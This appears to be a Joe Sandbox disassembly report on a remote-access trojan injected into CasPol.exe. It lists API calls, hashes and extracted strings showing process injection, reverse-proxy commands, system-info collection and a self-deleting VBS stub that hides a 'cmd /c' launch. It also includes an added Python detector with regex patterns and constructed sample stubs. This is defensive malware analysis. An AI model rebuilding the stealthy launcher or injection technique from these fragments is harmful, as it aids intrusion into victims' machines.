  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
• _free.LIBCMT ref: 10007CFB
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 10007D1D
• _free.LIBCMT ref: 10007D32
• _free.LIBCMT ref: 10007D3D
• _free.LIBCMT ref: 10007D5F
• _free.LIBCMT ref: 10007D72
• _free.LIBCMT ref: 10007D80
• _free.LIBCMT ref: 10007D8B
• _free.LIBCMT ref: 10007DC3
• _free.LIBCMT ref: 10007DCA
• _free.LIBCMT ref: 10007DE7
• _free.LIBCMT ref: 10007DFF
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
• Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
• Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
• Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
APIs
• __EH_prolog.LIBCMT ref: 0041913D
• GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
• Sleep.KERNEL32(000003E8), ref: 0041927D
• GetLocalTime.KERNEL32(?), ref: 0041928C
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
• API String ID: 489098229-65789007
• Opcode ID: 5540d76b84af48c8b24930b41dec85dffce92f3f7f811bdfea4c6e9bb0e6040e
• Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
• Opcode Fuzzy Hash: 5540d76b84af48c8b24930b41dec85dffce92f3f7f811bdfea4c6e9bb0e6040e
• Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
• ExitProcess.KERNEL32 ref: 0040C832
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-390638927
• Opcode ID: 891b1c77f3889e71ee1344af7ac6359a36d5df3dd2e3bd5fb2145de71cb9124a
• Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
• Opcode Fuzzy Hash: 891b1c77f3889e71ee1344af7ac6359a36d5df3dd2e3bd5fb2145de71cb9124a
• Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
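The strings in the block above (a `.vbs` name, `Temp`, `CreateObject("WScript.Shell").Run "cmd /c ""`, `""", 0`, and `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`) together with ShellExecuteW(`open`) followed by ExitProcess describe a stub script the RAT writes to Temp: it launches a command through a hidden `cmd /c`, then deletes itself. In VBScript a doubled `""` inside a string literal is an escaped quote, so the assembled line is `Run "cmd /c ""<payload>""", 0`, where window style 0 hides the console. The helper below is an added triage example, not code from Joe Sandbox or from the sample; it flags such scripts only when both pieces are present (a hidden `cmd /c` alone is common in benign admin scripts) and recovers the payload. The listing does not reveal what the payload is, so the sample scripts and the paths in them are constructed for the demonstration.

```python
"""Find and unpack the hidden-cmd / self-deleting .vbs stub described above.

Added example for this report; the sample scripts below are constructed,
their paths are made up, and the real payload is not visible in the listing.
"""
import re
from pathlib import Path
from typing import Iterator, NamedTuple, Optional

# Run "cmd /c ""<payload>""", 0  ->  cmd /c "<payload>" with window style 0 (hidden).
# The payload is captured non-greedily up to the closing """ that precedes ", 0".
RUN_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd\s+/c\s+""(?P<payload>.*?)"""\s*,\s*0\b',
    re.IGNORECASE | re.DOTALL,
)
# The script removing itself via its own full path.
SELF_DELETE_RE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(\s*WScript\.ScriptFullName\s*\)',
    re.IGNORECASE,
)


class Hit(NamedTuple):
    path: str
    payload: str        # the command that the hidden cmd /c runs
    self_deletes: bool  # script deletes itself after launching the payload


def inspect_vbs(text: str, path: str = "<inline>") -> Optional[Hit]:
    """Return a Hit when both the hidden launch and the self-delete are present, else None."""
    run = RUN_RE.search(text)
    if not run or not SELF_DELETE_RE.search(text):
        return None
    # Undo VBScript's doubled-quote escaping so the payload reads as cmd.exe receives it.
    payload = run.group("payload").replace('""', '"').strip()
    return Hit(path, payload, True)


def scan_vbs_dir(directory: Path) -> Iterator[Hit]:
    """Scan every *.vbs in a directory (the Temp drop location the strings point at)."""
    for p in sorted(directory.glob("*.vbs")):
        try:
            text = p.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hit = inspect_vbs(text, str(p))
        if hit:
            yield hit


# Constructed sample of the assembled stub; the executable path is made up.
SAMPLE_STUB = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\user\\AppData\\Roaming\\app\\app.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
# Constructed variant whose payload itself contains escaped quotes: del "C:\Program Files\x.exe"
SAMPLE_STUB_QUOTED = (
    'CreateObject("WScript.Shell").Run "cmd /c ""del ""C:\\Program Files\\x.exe' + '"' * 5 + ', 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptFullName)\r\n'
)
# Constructed benign script: hidden cmd /c launch, but no self-deletion, so it must not match.
SAMPLE_BENIGN = 'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Tools\\backup.cmd""", 0\r\n'

if __name__ == "__main__":
    import sys
    import tempfile
    for name, text in (("stub", SAMPLE_STUB), ("quoted", SAMPLE_STUB_QUOTED), ("benign", SAMPLE_BENIGN)):
        print(name, "->", inspect_vbs(text))
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(tempfile.gettempdir())
    for hit in scan_vbs_dir(target):
        print(f"{hit.path}: hidden cmd /c -> {hit.payload}")
```

Run it with the Temp directory of the affected user profile as the first argument; a hit gives you the command the stub ran, which is the lead for what was relaunched or removed before the script erased itself.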
APIs
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
• Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
• Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
• Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
APIs
  • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
• GetLastError.KERNEL32 ref: 00454AA6
• __dosmaperr.LIBCMT ref: 00454AAD
• GetFileType.KERNEL32(00000000), ref: 00454AB9
• GetLastError.KERNEL32 ref: 00454AC3
• __dosmaperr.LIBCMT ref: 00454ACC
• CloseHandle.KERNEL32(00000000), ref: 00454AEC
• CloseHandle.KERNEL32(?), ref: 00454C36
• GetLastError.KERNEL32 ref: 00454C68
• __dosmaperr.LIBCMT ref: 00454C6F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
• Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
• Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
• Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
• Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
• Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
• Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
• Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                  • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                  • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                  • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                  • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                  • _free.LIBCMT ref: 0043947A
                                                                                                                  • _free.LIBCMT ref: 00439481
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2441525078-0
                                                                                                                  APIs
                                                                                                                  • SetEvent.KERNEL32(?), ref: 00404E71
                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                  • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                  • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00404FF3
                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                  • API String ID: 2956720200-749203953
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                  • String ID: <$@$@FG$@FG$Temp
                                                                                                                  • API String ID: 1107811701-2245803885
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                  • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess
                                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                  • API String ID: 2050909247-4145329354
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 221034970-0
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00446DEF
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 00446DFB
                                                                                                                  • _free.LIBCMT ref: 00446E06
                                                                                                                  • _free.LIBCMT ref: 00446E11
                                                                                                                  • _free.LIBCMT ref: 00446E1C
                                                                                                                  • _free.LIBCMT ref: 00446E27
                                                                                                                  • _free.LIBCMT ref: 00446E32
                                                                                                                  • _free.LIBCMT ref: 00446E3D
                                                                                                                  • _free.LIBCMT ref: 00446E48
                                                                                                                  • _free.LIBCMT ref: 00446E56
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Eventinet_ntoa
                                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                  • API String ID: 3578746661-4192532303
                                                                                                                  • Opcode ID: dce6e6b055dd14d2158c78063b175744d8f9912cca24f3b66511937ea36bc463
                                                                                                                  • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                  • Opcode Fuzzy Hash: dce6e6b055dd14d2158c78063b175744d8f9912cca24f3b66511937ea36bc463
                                                                                                                  • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                  APIs
                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DecodePointer
                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                  • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                  • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                  • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                                                                                                                  • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                  APIs
                                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 1324828854-661517699
                                                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                  APIs
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                                  • Opcode ID: 89439ef8661f45509590dfd36efddff029347bf871da0d2e15e3f7cf58161c4e
